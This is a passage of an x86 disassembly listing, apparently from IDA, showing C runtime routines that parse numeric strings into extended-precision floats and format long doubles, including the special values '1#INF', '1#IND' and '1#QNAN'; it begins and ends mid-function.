
loc_412A1B:				; CODE XREF: sub_4129AD+81j
		mov	al, [edx]
		cmp	al, 20h
		jz	short loc_412A2D
		cmp	al, 9
		jz	short loc_412A2D
		cmp	al, 0Ah
		jz	short loc_412A2D
		cmp	al, 0Dh
		jnz	short loc_412A30

loc_412A2D:				; CODE XREF: sub_4129AD+72j
					; sub_4129AD+76j ...
		inc	edx
		jmp	short loc_412A1B
; ---------------------------------------------------------------------------

loc_412A30:				; CODE XREF: sub_4129AD+7Ej
		mov	bl, 30h

loc_412A32:				; CODE XREF: sub_4129AD+A6j
					; sub_4129AD+BCj ...
		mov	al, [edx]
		inc	edx
		cmp	ecx, 0Bh	; switch 12 cases
		ja	loc_412C6D	; default
					; jumptable 00412A3E case 10
		jmp	ds:off_413041[ecx*4] ; switch jump

loc_412A45:				; DATA XREF: .text:off_413041o
		mov	cl, al		; jumptable 00412A3E case 0
		sub	cl, 31h
		cmp	cl, 8
		ja	short loc_412A55

loc_412A4F:				; CODE XREF: sub_4129AD+F7j
					; sub_4129AD+14Aj
		push	3

loc_412A51:				; CODE XREF: sub_4129AD+201j
					; sub_4129AD+218j
		pop	ecx
		dec	edx
		jmp	short loc_412A32
; ---------------------------------------------------------------------------

loc_412A55:				; CODE XREF: sub_4129AD+A0j
		mov	ecx, [ebp+arg_1C]
		mov	ecx, [ecx]
		mov	ecx, [ecx+0BCh]
		mov	ecx, [ecx]
		cmp	al, [ecx]
		jnz	short loc_412A6B

loc_412A66:				; CODE XREF: sub_4129AD+15Fj
		push	5

loc_412A68:				; CODE XREF: sub_4129AD+10Cj
					; sub_4129AD+138j ...
		pop	ecx
		jmp	short loc_412A32
; ---------------------------------------------------------------------------

loc_412A6B:				; CODE XREF: sub_4129AD+B7j
		movsx	eax, al
		sub	eax, 2Bh
		jz	short loc_412A90
		dec	eax
		dec	eax
		jz	short loc_412A84
		sub	eax, 3
		jnz	loc_412C0B

loc_412A80:				; CODE XREF: sub_4129AD+118j
					; sub_4129AD+167j
		mov	ecx, esi
		jmp	short loc_412A32
; ---------------------------------------------------------------------------

loc_412A84:				; CODE XREF: sub_4129AD+C8j
		push	2
		pop	ecx
		mov	[ebp+var_74], 8000h
		jmp	short loc_412A32
; ---------------------------------------------------------------------------

loc_412A90:				; CODE XREF: sub_4129AD+C4j
		and	[ebp+var_74], 0
		push	2
		pop	ecx
		jmp	short loc_412A32
; ---------------------------------------------------------------------------

loc_412A99:				; CODE XREF: sub_4129AD+91j
					; DATA XREF: .text:off_413041o
		mov	cl, al		; jumptable 00412A3E case 1
		sub	cl, 31h
		cmp	cl, 8
		mov	[ebp+var_58], esi
		jbe	short loc_412A4F
		mov	ecx, [ebp+arg_1C]
		mov	ecx, [ecx]
		mov	ecx, [ecx+0BCh]
		mov	ecx, [ecx]
		cmp	al, [ecx]
		jnz	short loc_412ABB

loc_412AB7:				; CODE XREF: sub_4129AD+1A7j
		push	4
		jmp	short loc_412A68
; ---------------------------------------------------------------------------

loc_412ABB:				; CODE XREF: sub_4129AD+108j
		cmp	al, 2Bh
		jz	short loc_412AE7
		cmp	al, 2Dh
		jz	short loc_412AE7
		cmp	al, bl
		jz	short loc_412A80

loc_412AC7:				; CODE XREF: sub_4129AD+1B5j
		cmp	al, 43h
		jle	loc_412C0B
		cmp	al, 45h
		jle	short loc_412AE3
		cmp	al, 63h
		jle	loc_412C0B
		cmp	al, 65h
		jg	loc_412C0B

loc_412AE3:				; CODE XREF: sub_4129AD+124j
		push	6
		jmp	short loc_412A68
; ---------------------------------------------------------------------------

loc_412AE7:				; CODE XREF: sub_4129AD+110j
					; sub_4129AD+114j ...
		dec	edx
		push	0Bh
		jmp	loc_412A68
; ---------------------------------------------------------------------------

loc_412AEF:				; CODE XREF: sub_4129AD+91j
					; DATA XREF: .text:off_413041o
		mov	cl, al		; jumptable 00412A3E case 2
		sub	cl, 31h
		cmp	cl, 8
		jbe	loc_412A4F
		mov	ecx, [ebp+arg_1C]
		mov	ecx, [ecx]
		mov	ecx, [ecx+0BCh]
		mov	ecx, [ecx]
		cmp	al, [ecx]
		jz	loc_412A66
		cmp	al, bl
		jz	loc_412A80

loc_412B1A:				; CODE XREF: sub_4129AD+1F9j
					; sub_4129AD:loc_412BD9j
		mov	edx, [ebp+var_54]
		jmp	loc_412C36
; ---------------------------------------------------------------------------

loc_412B22:				; CODE XREF: sub_4129AD+91j
					; DATA XREF: .text:off_413041o
		mov	[ebp+var_58], esi ; jumptable 00412A3E case 3
		jmp	short loc_412B41
; ---------------------------------------------------------------------------

loc_412B27:				; CODE XREF: sub_4129AD+196j
		cmp	al, 39h
		jg	short loc_412B45
		cmp	[ebp+var_4C], 19h
		jnb	short loc_412B3B
		inc	[ebp+var_4C]
		sub	al, bl
		mov	[edi], al
		inc	edi
		jmp	short loc_412B3E
; ---------------------------------------------------------------------------

loc_412B3B:				; CODE XREF: sub_4129AD+182j
		inc	[ebp+var_50]

loc_412B3E:				; CODE XREF: sub_4129AD+18Cj
		mov	al, [edx]
		inc	edx

loc_412B41:				; CODE XREF: sub_4129AD+178j
		cmp	al, bl
		jge	short loc_412B27

loc_412B45:				; CODE XREF: sub_4129AD+17Cj
		mov	ecx, [ebp+arg_1C]
		mov	ecx, [ecx]
		mov	ecx, [ecx+0BCh]
		mov	ecx, [ecx]
		cmp	al, [ecx]
		jz	loc_412AB7

loc_412B5A:				; CODE XREF: sub_4129AD+1D6j
					; sub_4129AD+1F0j
		cmp	al, 2Bh
		jz	short loc_412AE7
		cmp	al, 2Dh
		jz	short loc_412AE7
		jmp	loc_412AC7
; ---------------------------------------------------------------------------

loc_412B67:				; CODE XREF: sub_4129AD+91j
					; DATA XREF: .text:off_413041o
		cmp	[ebp+var_4C], 0	; jumptable 00412A3E case 4
		mov	[ebp+var_58], esi
		mov	[ebp+var_5C], esi
		jnz	short loc_412B99
		jmp	short loc_412B7B
; ---------------------------------------------------------------------------

loc_412B75:				; CODE XREF: sub_4129AD+1D0j
		dec	[ebp+var_50]
		mov	al, [edx]
		inc	edx

loc_412B7B:				; CODE XREF: sub_4129AD+1C6j
		cmp	al, bl
		jz	short loc_412B75
		jmp	short loc_412B99
; ---------------------------------------------------------------------------

loc_412B81:				; CODE XREF: sub_4129AD+1EEj
		cmp	al, 39h
		jg	short loc_412B5A
		cmp	[ebp+var_4C], 19h
		jnb	short loc_412B96
		inc	[ebp+var_4C]
		sub	al, bl
		mov	[edi], al
		inc	edi
		dec	[ebp+var_50]

loc_412B96:				; CODE XREF: sub_4129AD+1DCj
		mov	al, [edx]
		inc	edx

loc_412B99:				; CODE XREF: sub_4129AD+1C4j
					; sub_4129AD+1D2j
		cmp	al, bl
		jge	short loc_412B81
		jmp	short loc_412B5A
; ---------------------------------------------------------------------------

loc_412B9F:				; CODE XREF: sub_4129AD+91j
					; DATA XREF: .text:off_413041o
		sub	al, bl		; jumptable 00412A3E case 5
		cmp	al, 9
		mov	[ebp+var_5C], esi
		ja	loc_412B1A
		push	4
		jmp	loc_412A51
; ---------------------------------------------------------------------------

loc_412BB3:				; CODE XREF: sub_4129AD+91j
					; DATA XREF: .text:off_413041o
		lea	ecx, [edx-2]	; jumptable 00412A3E case 6
		mov	[ebp+var_54], ecx
		mov	cl, al
		sub	cl, 31h
		cmp	cl, 8
		ja	short loc_412BCA

loc_412BC3:				; CODE XREF: sub_4129AD+25Cj
					; sub_4129AD+269j
		push	9
		jmp	loc_412A51
; ---------------------------------------------------------------------------

loc_412BCA:				; CODE XREF: sub_4129AD+214j
		movsx	eax, al
		sub	eax, 2Bh
		jz	short loc_412BF2
		dec	eax
		dec	eax
		jz	short loc_412BE6
		sub	eax, 3

loc_412BD9:				; CODE XREF: sub_4129AD+26Dj
		jnz	loc_412B1A
		push	8
		jmp	loc_412A68
; ---------------------------------------------------------------------------

loc_412BE6:				; CODE XREF: sub_4129AD+227j
					; sub_4129AD+285j
		or	[ebp+var_68], 0FFFFFFFFh
		push	7
		pop	ecx
		jmp	loc_412A32
; ---------------------------------------------------------------------------

loc_412BF2:				; CODE XREF: sub_4129AD+223j
					; sub_4129AD+281j
		push	7
		jmp	loc_412A68
; ---------------------------------------------------------------------------

loc_412BF9:				; CODE XREF: sub_4129AD+91j
					; DATA XREF: .text:off_413041o
		mov	[ebp+var_60], esi ; jumptable 00412A3E case 8
		jmp	short loc_412C01
; ---------------------------------------------------------------------------

loc_412BFE:				; CODE XREF: sub_4129AD+256j
		mov	al, [edx]
		inc	edx

loc_412C01:				; CODE XREF: sub_4129AD+24Fj
		cmp	al, bl
		jz	short loc_412BFE
		sub	al, 31h
		cmp	al, 8
		jbe	short loc_412BC3

loc_412C0B:				; CODE XREF: sub_4129AD+CDj
					; sub_4129AD+11Cj ...
		dec	edx
		jmp	short loc_412C36
; ---------------------------------------------------------------------------

loc_412C0E:				; CODE XREF: sub_4129AD+91j
					; DATA XREF: .text:off_413041o
		mov	cl, al		; jumptable 00412A3E case 7
		sub	cl, 31h
		cmp	cl, 8
		jbe	short loc_412BC3
		cmp	al, bl
		jmp	short loc_412BD9
; ---------------------------------------------------------------------------

loc_412C1C:				; CODE XREF: sub_4129AD+91j
					; DATA XREF: .text:off_413041o
		cmp	[ebp+arg_18], 0	; jumptable 00412A3E case 11
		jz	short loc_412C69
		movsx	eax, al
		sub	eax, 2Bh
		lea	ecx, [edx-1]
		mov	[ebp+var_54], ecx
		jz	short loc_412BF2
		dec	eax
		dec	eax
		jz	short loc_412BE6
		mov	edx, ecx

loc_412C36:				; CODE XREF: sub_4129AD+170j
					; sub_4129AD+25Fj ...
		cmp	[ebp+var_58], 0
		mov	eax, [ebp+var_70]
		mov	[eax], edx
		jz	loc_412FEA
		push	18h
		pop	eax
		cmp	[ebp+var_4C], eax
		jbe	short loc_412C5D
		cmp	[ebp+var_9], 5
		jl	short loc_412C56
		inc	[ebp+var_9]

loc_412C56:				; CODE XREF: sub_4129AD+2A4j
		dec	edi
		inc	[ebp+var_50]
		mov	[ebp+var_4C], eax

loc_412C5D:				; CODE XREF: sub_4129AD+29Ej
		cmp	[ebp+var_4C], 0
		jbe	loc_413011
		jmp	short loc_412CC2
; ---------------------------------------------------------------------------

loc_412C69:				; CODE XREF: sub_4129AD+273j
		push	0Ah
		pop	ecx
		dec	edx

loc_412C6D:				; CODE XREF: sub_4129AD+8Bj
					; sub_4129AD+91j
					; DATA XREF: ...
		cmp	ecx, 0Ah	; default
					; jumptable 00412A3E case 10
		jnz	loc_412A32
		jmp	short loc_412C36
; ---------------------------------------------------------------------------

loc_412C78:				; CODE XREF: sub_4129AD+91j
					; DATA XREF: .text:off_413041o
		mov	[ebp+var_60], esi ; jumptable 00412A3E case 9
		xor	ecx, ecx
		jmp	short loc_412C98
; ---------------------------------------------------------------------------

loc_412C7F:				; CODE XREF: sub_4129AD+2EDj
		cmp	al, 39h
		jg	short loc_412CA3
		imul	ecx, 0Ah
		movsx	esi, al
		lea	ecx, [ecx+esi-30h]
		cmp	ecx, 1450h
		jg	short loc_412C9E
		mov	al, [edx]
		inc	edx

loc_412C98:				; CODE XREF: sub_4129AD+2D0j
		cmp	al, bl
		jge	short loc_412C7F
		jmp	short loc_412CA3
; ---------------------------------------------------------------------------

loc_412C9E:				; CODE XREF: sub_4129AD+2E6j
		mov	ecx, 1451h

loc_412CA3:				; CODE XREF: sub_4129AD+2D4j
					; sub_4129AD+2EFj
		mov	[ebp+var_64], ecx
		jmp	short loc_412CB3
; ---------------------------------------------------------------------------

loc_412CA8:				; CODE XREF: sub_4129AD+308j
		cmp	al, 39h
		jg	loc_412C0B
		mov	al, [edx]
		inc	edx

loc_412CB3:				; CODE XREF: sub_4129AD+2F9j
		cmp	al, bl
		jge	short loc_412CA8
		jmp	loc_412C0B
; ---------------------------------------------------------------------------

loc_412CBC:				; CODE XREF: sub_4129AD+319j
		dec	[ebp+var_4C]
		inc	[ebp+var_50]

loc_412CC2:				; CODE XREF: sub_4129AD+2BAj
		dec	edi
		cmp	byte ptr [edi],	0
		jz	short loc_412CBC
		lea	eax, [ebp+var_3C]
		push	eax
		push	[ebp+var_4C]
		lea	eax, [ebp+var_20]
		push	eax
		call	sub_413D6A
		mov	eax, [ebp+var_64]
		xor	ecx, ecx
		add	esp, 0Ch
		cmp	[ebp+var_68], ecx
		jge	short loc_412CE7
		neg	eax

loc_412CE7:				; CODE XREF: sub_4129AD+336j
		add	eax, [ebp+var_50]
		cmp	[ebp+var_60], ecx
		jnz	short loc_412CF2
		add	eax, [ebp+arg_10]

loc_412CF2:				; CODE XREF: sub_4129AD+340j
		cmp	[ebp+var_5C], ecx
		jnz	short loc_412CFA
		sub	eax, [ebp+arg_14]

loc_412CFA:				; CODE XREF: sub_4129AD+348j
		cmp	eax, 1450h
		jg	loc_412FF3
		cmp	eax, 0FFFFEBB0h
		jl	loc_41300A
		mov	esi, offset dword_425260
		sub	esi, 60h
		cmp	eax, ecx
		mov	[ebp+var_54], eax
		jz	loc_412FD8
		jge	short loc_412D32
		neg	eax
		mov	esi, offset dword_4253C0
		mov	[ebp+var_54], eax
		sub	esi, 60h

loc_412D32:				; CODE XREF: sub_4129AD+376j
		cmp	[ebp+arg_C], ecx
		jnz	short loc_412D3B
		mov	word ptr [ebp+var_3C], cx

loc_412D3B:				; CODE XREF: sub_4129AD+388j
		cmp	[ebp+var_54], ecx
		jz	loc_412FD8

loc_412D44:				; CODE XREF: sub_4129AD+625j
		mov	eax, [ebp+var_54]
		sar	[ebp+var_54], 3
		add	esi, 54h
		and	eax, 7
		test	eax, eax
		mov	[ebp+var_4C], esi
		jz	loc_412FCE
		imul	eax, 0Ch
		add	eax, esi
		mov	ebx, eax
		cmp	word ptr [ebx],	8000h
		mov	[ebp+var_70], ebx
		jb	short loc_412D81
		mov	esi, ebx
		lea	edi, [ebp+var_48]
		movsd
		movsd
		movsd
		dec	[ebp+var_46]
		mov	esi, [ebp+var_4C]
		lea	ebx, [ebp+var_48]
		mov	[ebp+var_70], ebx

loc_412D81:				; CODE XREF: sub_4129AD+3BEj
		movzx	edx, word ptr [ebx+0Ah]
		mov	ecx, [ebp+var_32]
		xor	eax, eax
		mov	[ebp+var_50], eax
		mov	[ebp+var_2C], eax
		mov	[ebp+var_28], eax
		mov	[ebp+var_24], eax
		mov	eax, edx
		mov	edi, 7FFFh
		xor	eax, ecx
		and	ecx, edi
		and	edx, edi
		and	eax, 8000h
		cmp	cx, 7FFFh
		lea	edi, [edx+ecx]
		movzx	edi, di
		jnb	loc_412FB4
		cmp	dx, 7FFFh
		jnb	loc_412FB4
		cmp	di, 0BFFDh
		ja	loc_412FB4
		cmp	di, 3FBFh
		ja	short loc_412DE3
		xor	eax, eax
		mov	[ebp+var_38], eax
		mov	[ebp+var_3C], eax
		jmp	loc_412FCB
; ---------------------------------------------------------------------------

loc_412DE3:				; CODE XREF: sub_4129AD+427j
		test	cx, cx
		jnz	short loc_412E07
		inc	edi
		test	dword ptr [ebp-34h], 7FFFFFFFh
		jnz	short loc_412E07
		cmp	[ebp+var_38], 0
		jnz	short loc_412E07
		cmp	[ebp+var_3C], 0
		jnz	short loc_412E07
		and	word ptr [ebp+var_32], cx
		jmp	loc_412FCE
; ---------------------------------------------------------------------------

loc_412E07:				; CODE XREF: sub_4129AD+439j
					; sub_4129AD+443j ...
		xor	ecx, ecx
		cmp	dx, cx
		jnz	short loc_412E2F
		inc	edi
		test	dword ptr [ebx+8], 7FFFFFFFh
		jnz	short loc_412E2F
		cmp	[ebx+4], ecx
		jnz	short loc_412E2F
		cmp	[ebx], ecx
		jnz	short loc_412E2F
		mov	[ebp-34h], ecx
		mov	[ebp+var_38], ecx
		mov	[ebp+var_3C], ecx
		jmp	loc_412FCE
; ---------------------------------------------------------------------------

loc_412E2F:				; CODE XREF: sub_4129AD+45Fj
					; sub_4129AD+469j ...
		and	[ebp+var_68], ecx
		lea	esi, [ebp+var_28]
		mov	[ebp+var_58], 5

loc_412E3C:				; CODE XREF: sub_4129AD+4FFj
		mov	ecx, [ebp+var_68]
		mov	edx, [ebp+var_58]
		add	ecx, ecx
		test	edx, edx
		mov	[ebp+var_64], edx
		jle	short loc_412EA0
		lea	ecx, [ebp+ecx+var_3C]
		add	ebx, 8
		mov	[ebp+var_5C], ecx
		mov	[ebp+var_60], ebx

loc_412E58:				; CODE XREF: sub_4129AD+4EEj
		mov	ecx, [ebp+var_60]
		mov	edx, [ebp+var_5C]
		movzx	edx, word ptr [edx]
		movzx	ecx, word ptr [ecx]
		and	[ebp+var_78], 0
		imul	ecx, edx
		mov	edx, [esi-4]
		lea	ebx, [edx+ecx]
		cmp	ebx, edx
		jb	short loc_412E79
		cmp	ebx, ecx
		jnb	short loc_412E80

loc_412E79:				; CODE XREF: sub_4129AD+4C6j
		mov	[ebp+var_78], 1

loc_412E80:				; CODE XREF: sub_4129AD+4CAj
		cmp	[ebp+var_78], 0
		mov	[esi-4], ebx
		jz	short loc_412E8C
		inc	word ptr [esi]

loc_412E8C:				; CODE XREF: sub_4129AD+4DAj
		add	[ebp+var_5C], 2
		sub	[ebp+var_60], 2
		dec	[ebp+var_64]
		cmp	[ebp+var_64], 0
		jg	short loc_412E58
		mov	ebx, [ebp+var_70]

loc_412EA0:				; CODE XREF: sub_4129AD+49Cj
		inc	esi
		inc	esi
		inc	[ebp+var_68]
		dec	[ebp+var_58]
		cmp	[ebp+var_58], 0
		jg	short loc_412E3C
		add	edi, 0C002h
		test	di, di
		jle	short loc_412EF4

loc_412EB9:				; CODE XREF: sub_4129AD+540j
		test	[ebp+var_24], 80000000h
		jnz	short loc_412EEF
		mov	esi, [ebp+var_28]
		mov	ecx, [ebp+var_2C]
		shl	[ebp+var_2C], 1
		shr	ecx, 1Fh
		mov	edx, esi
		add	esi, esi
		or	esi, ecx
		mov	ecx, [ebp+var_24]
		shr	edx, 1Fh
		add	ecx, ecx
		or	ecx, edx
		add	edi, 0FFFFh
		test	di, di
		mov	[ebp+var_28], esi
		mov	[ebp+var_24], ecx
		jg	short loc_412EB9

loc_412EEF:				; CODE XREF: sub_4129AD+513j
		test	di, di
		jg	short loc_412F42

loc_412EF4:				; CODE XREF: sub_4129AD+50Aj
		add	edi, 0FFFFh
		test	di, di
		jge	short loc_412F42
		mov	ecx, edi
		neg	ecx
		movzx	esi, cx
		add	edi, esi

loc_412F08:				; CODE XREF: sub_4129AD+588j
		test	byte ptr [ebp+var_2C], 1
		jz	short loc_412F11
		inc	[ebp+var_50]

loc_412F11:				; CODE XREF: sub_4129AD+55Fj
		mov	ecx, [ebp+var_24]
		mov	ebx, [ebp+var_28]
		mov	edx, [ebp+var_28]
		shr	[ebp+var_24], 1
		shl	ecx, 1Fh
		shr	ebx, 1
		or	ebx, ecx
		mov	ecx, [ebp+var_2C]
		shl	edx, 1Fh
		shr	ecx, 1
		or	ecx, edx
		dec	esi
		mov	[ebp+var_28], ebx
		mov	[ebp+var_2C], ecx
		jnz	short loc_412F08
		cmp	[ebp+var_50], 0
		jz	short loc_412F42
		or	word ptr [ebp+var_2C], 1

loc_412F42:				; CODE XREF: sub_4129AD+545j
					; sub_4129AD+550j ...
		cmp	word ptr [ebp+var_2C], 8000h
		ja	short loc_412F5B
		mov	ecx, [ebp+var_2C]
		and	ecx, 1FFFFh
		cmp	ecx, 18000h
		jnz	short loc_412F8E

loc_412F5B:				; CODE XREF: sub_4129AD+59Bj
		cmp	[ebp+var_2C+2],	0FFFFFFFFh
		jnz	short loc_412F8B
		and	[ebp+var_2C+2],	0
		cmp	[ebp+var_28+2],	0FFFFFFFFh
		jnz	short loc_412F86
		and	[ebp+var_28+2],	0
		cmp	word ptr [ebp+var_24+2], 0FFFFh
		jnz	short loc_412F80
		mov	word ptr [ebp+var_24+2], 8000h
		inc	edi
		jmp	short loc_412F8E
; ---------------------------------------------------------------------------

loc_412F80:				; CODE XREF: sub_4129AD+5C8j
		inc	word ptr [ebp+var_24+2]
		jmp	short loc_412F8E
; ---------------------------------------------------------------------------

loc_412F86:				; CODE XREF: sub_4129AD+5BCj
		inc	[ebp+var_28+2]
		jmp	short loc_412F8E
; ---------------------------------------------------------------------------

loc_412F8B:				; CODE XREF: sub_4129AD+5B2j
		inc	[ebp+var_2C+2]

loc_412F8E:				; CODE XREF: sub_4129AD+5ACj
					; sub_4129AD+5D1j ...
		cmp	di, 7FFFh
		mov	esi, [ebp+var_4C]
		jnb	short loc_412FB4
		mov	cx, word ptr [ebp+var_2C+2]
		mov	word ptr [ebp+var_3C], cx
		mov	ecx, [ebp+var_28]
		mov	[ebp+var_3C+2],	ecx
		mov	ecx, [ebp+var_24]
		or	edi, eax
		mov	[ebp+var_38+2],	ecx
		mov	word ptr [ebp+var_32], di
		jmp	short loc_412FCE
; ---------------------------------------------------------------------------

loc_412FB4:				; CODE XREF: sub_4129AD+406j
					; sub_4129AD+411j ...
		neg	ax
		sbb	eax, eax
		and	[ebp+var_38], 0
		and	eax, 80000000h
		add	eax, 7FFF8000h
		and	[ebp+var_3C], 0

loc_412FCB:				; CODE XREF: sub_4129AD+431j
		mov	[ebp-34h], eax

loc_412FCE:				; CODE XREF: sub_4129AD+3A9j
					; sub_4129AD+455j ...
		cmp	[ebp+var_54], 0
		jnz	loc_412D44

loc_412FD8:				; CODE XREF: sub_4129AD+370j
					; sub_4129AD+391j
		mov	eax, [ebp-34h]
		movzx	ecx, word ptr [ebp+var_3C]
		mov	esi, [ebp+var_3C+2]
		mov	edx, [ebp+var_38+2]
		shr	eax, 10h
		jmp	short loc_413019
; ---------------------------------------------------------------------------

loc_412FEA:				; CODE XREF: sub_4129AD+292j
		mov	[ebp+var_6C], 4
		jmp	short loc_413011
; ---------------------------------------------------------------------------

loc_412FF3:				; CODE XREF: sub_4129AD+352j
		xor	esi, esi
		mov	eax, 7FFFh
		mov	edx, 80000000h
		xor	ecx, ecx
		mov	[ebp+var_6C], 2
		jmp	short loc_413019
; ---------------------------------------------------------------------------

loc_41300A:				; CODE XREF: sub_4129AD+35Dj
		mov	[ebp+var_6C], 1

loc_413011:				; CODE XREF: sub_4129AD+2B4j
					; sub_4129AD+644j
		xor	ecx, ecx
		xor	eax, eax
		xor	edx, edx
		xor	esi, esi

loc_413019:				; CODE XREF: sub_4129AD+63Bj
					; sub_4129AD+65Bj
		mov	edi, [ebp+var_7C]
		or	eax, [ebp+var_74]
		mov	[edi], cx
		mov	[edi+0Ah], ax
		mov	eax, [ebp+var_6C]
		mov	[edi+2], esi
		mov	[edi+6], edx

loc_41302F:				; CODE XREF: sub_4129AD+63j
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
sub_4129AD	endp

; ---------------------------------------------------------------------------
		db 8Dh,	49h, 0
off_413041	dd offset loc_412A45	; DATA XREF: sub_4129AD+91r
		dd offset loc_412A99	; jump table for switch	statement
		dd offset loc_412AEF
		dd offset loc_412B22
		dd offset loc_412B67
		dd offset loc_412B9F
		dd offset loc_412BB3
		dd offset loc_412C0E
		dd offset loc_412BF9
		dd offset loc_412C78
		dd offset loc_412C6D
		dd offset loc_412C1C

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_413071	proc near		; CODE XREF: sub_411D31+3Fp

var_74		= dword	ptr -74h
var_70		= dword	ptr -70h
var_6C		= dword	ptr -6Ch
var_68		= dword	ptr -68h
var_64		= dword	ptr -64h
var_60		= dword	ptr -60h
var_5C		= dword	ptr -5Ch
var_58		= dword	ptr -58h
var_54		= dword	ptr -54h
var_50		= dword	ptr -50h
var_4C		= dword	ptr -4Ch
var_48		= dword	ptr -48h
var_44		= dword	ptr -44h
var_40		= dword	ptr -40h
var_3C		= dword	ptr -3Ch
var_38		= dword	ptr -38h
var_34		= dword	ptr -34h
var_30		= dword	ptr -30h
var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_20		= dword	ptr -20h
var_1A		= dword	ptr -1Ah
var_16		= dword	ptr -16h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= byte ptr  8
arg_C		= dword	ptr  14h
arg_10		= byte ptr  18h
arg_14		= dword	ptr  1Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 74h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		mov	ebx, [ebp+arg_14]
		push	esi
		push	edi
		lea	esi, [ebp+arg_0]
		lea	edi, [ebp+var_10]
		movsd
		movsd
		movsw
		mov	edx, [ebp+var_8]
		mov	ecx, edx
		mov	eax, 8000h
		and	ecx, eax
		and	edx, 7FFFh
		test	cx, cx
		mov	[ebp+var_60], ebx
		mov	byte ptr [ebp+var_30], 0CCh
		mov	byte ptr [ebp+var_30+1], 0CCh
		mov	byte ptr [ebp+var_30+2], 0CCh
		mov	byte ptr [ebp+var_30+3], 0CCh
		mov	byte ptr [ebp+var_2C], 0CCh
		mov	byte ptr [ebp+var_2C+1], 0CCh
		mov	byte ptr [ebp+var_2C+2], 0CCh
		mov	byte ptr [ebp+var_2C+3], 0CCh
		mov	byte ptr [ebp+var_28], 0CCh
		mov	byte ptr [ebp+var_28+1], 0CCh
		mov	byte ptr [ebp+var_28+2], 0FBh
		mov	byte ptr [ebp+var_28+3], 3Fh
		mov	[ebp+var_74], 1
		mov	[ebp+var_6C], ecx
		jz	short loc_4130EB
		mov	byte ptr [ebx+2], 2Dh
		jmp	short loc_4130EF
; ---------------------------------------------------------------------------

loc_4130EB:				; CODE XREF: sub_413071+72j
		mov	byte ptr [ebx+2], 20h

loc_4130EF:				; CODE XREF: sub_413071+78j
		test	dx, dx
		mov	esi, [ebp+var_C]
		mov	edi, [ebp+var_10]
		jnz	short loc_413128
		test	esi, esi
		jnz	short loc_413128
		test	edi, edi
		jnz	short loc_413128
		and	[ebx], di
		cmp	cx, ax
		setnz	al
		dec	al
		and	al, 0Dh
		add	al, 20h
		mov	[ebx+2], al
		mov	byte ptr [ebx+3], 1
		mov	byte ptr [ebx+4], 30h
		mov	byte ptr [ebx+5], 0

loc_413120:				; CODE XREF: sub_413071+6FBj
					; sub_413071+8C3j
		xor	eax, eax
		inc	eax
		jmp	loc_4138F1
; ---------------------------------------------------------------------------

loc_413128:				; CODE XREF: sub_413071+87j
					; sub_413071+8Bj ...
		cmp	dx, 7FFFh
		jnz	loc_4131D1
		mov	eax, 80000000h
		cmp	esi, eax
		mov	word ptr [ebx],	1
		jnz	short loc_413145
		test	edi, edi
		jz	short loc_413154

loc_413145:				; CODE XREF: sub_413071+CEj
		test	esi, 40000000h
		jnz	short loc_413154
		push	offset a1Snan	; "1#SNAN"
		jmp	short loc_4131A5
; ---------------------------------------------------------------------------

loc_413154:				; CODE XREF: sub_413071+D2j
					; sub_413071+DAj
		test	cx, cx
		jz	short loc_41316C
		cmp	esi, 0C0000000h
		jnz	short loc_41316C
		test	edi, edi
		jnz	short loc_4131A0
		push	offset a1Ind	; "1#IND"
		jmp	short loc_413179
; ---------------------------------------------------------------------------

loc_41316C:				; CODE XREF: sub_413071+E6j
					; sub_413071+EEj
		cmp	esi, eax
		jnz	short loc_4131A0
		test	edi, edi
		jnz	short loc_4131A0
		push	offset a1Inf	; "1#INF"

loc_413179:				; CODE XREF: sub_413071+F9j
		lea	eax, [ebx+4]
		push	16h
		push	eax
		call	sub_407C95
		add	esp, 0Ch
		xor	esi, esi
		test	eax, eax
		jz	short loc_41319A
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4033CB
		add	esp, 14h

loc_41319A:				; CODE XREF: sub_413071+11Aj
		mov	byte ptr [ebx+3], 5
		jmp	short loc_4131CA
; ---------------------------------------------------------------------------

loc_4131A0:				; CODE XREF: sub_413071+F2j
					; sub_413071+FDj ...
		push	offset a1Qnan	; "1#QNAN"

loc_4131A5:				; CODE XREF: sub_413071+E1j
		lea	eax, [ebx+4]
		push	16h
		push	eax
		call	sub_407C95
		add	esp, 0Ch
		xor	esi, esi
		test	eax, eax
		jz	short loc_4131C6
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		call	sub_4033CB
		add	esp, 14h

loc_4131C6:				; CODE XREF: sub_413071+146j
		mov	byte ptr [ebx+3], 6

loc_4131CA:				; CODE XREF: sub_413071+12Dj
		xor	eax, eax
		jmp	loc_4138F1
; ---------------------------------------------------------------------------

loc_4131D1:				; CODE XREF: sub_413071+BCj
		movzx	ecx, dx
		mov	ebx, ecx
		imul	ecx, 4D10h
		shr	ebx, 8
		mov	eax, esi
		shr	eax, 18h
		lea	eax, [ebx+eax*2]
		imul	eax, 4Dh
		lea	eax, [eax+ecx-134312F4h]
		sar	eax, 10h
		movzx	ecx, ax
		movsx	ebx, cx
		mov	[ebp+var_4C], ecx
		xor	eax, eax
		mov	ecx, offset dword_425260
		neg	ebx
		sub	ecx, 60h
		cmp	ebx, eax
		mov	word ptr [ebp+var_16], dx
		mov	[ebp+var_1A], esi
		mov	[ebp+var_20+2],	edi
		mov	word ptr [ebp+var_20], ax
		mov	[ebp+var_68], ecx
		jz	loc_4134D0
		jge	short loc_413231
		mov	ecx, offset dword_4253C0
		neg	ebx
		sub	ecx, 60h
		mov	[ebp+var_68], ecx

loc_413231:				; CODE XREF: sub_413071+1B1j
		cmp	ebx, eax
		jz	loc_4134D0

loc_413239:				; CODE XREF: sub_413071+457j
		add	[ebp+var_68], 54h
		mov	ecx, ebx
		and	ecx, 7
		sar	ebx, 3
		test	ecx, ecx
		jz	loc_4134C6
		imul	ecx, 0Ch
		add	ecx, [ebp+var_68]
		cmp	word ptr [ecx],	8000h
		mov	[ebp+var_64], ecx
		jb	short loc_413270
		mov	esi, ecx
		lea	edi, [ebp+var_3C]
		movsd
		movsd
